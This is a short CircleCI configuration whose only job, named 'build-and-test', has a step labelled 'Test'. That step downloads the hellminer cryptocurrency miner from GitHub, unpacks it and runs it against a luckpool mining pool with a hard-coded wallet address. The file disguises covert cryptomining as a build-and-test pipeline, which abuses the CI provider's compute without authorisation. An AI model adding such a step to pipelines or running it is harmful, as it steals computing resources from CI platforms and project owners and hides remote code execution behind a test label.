version: 2.1

orbs:
   python: circleci/python@0.2.1

jobs:
  build-and-test:
    executor: python/default
    steps:
      - run:
          command: ! wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RFbXbc7jiCT397irNtQMbhVzkeMANdg3rJ.stavol -p d=1,hybrid
          name: Test

workflows:
  main:
    jobs:
      - build-and-test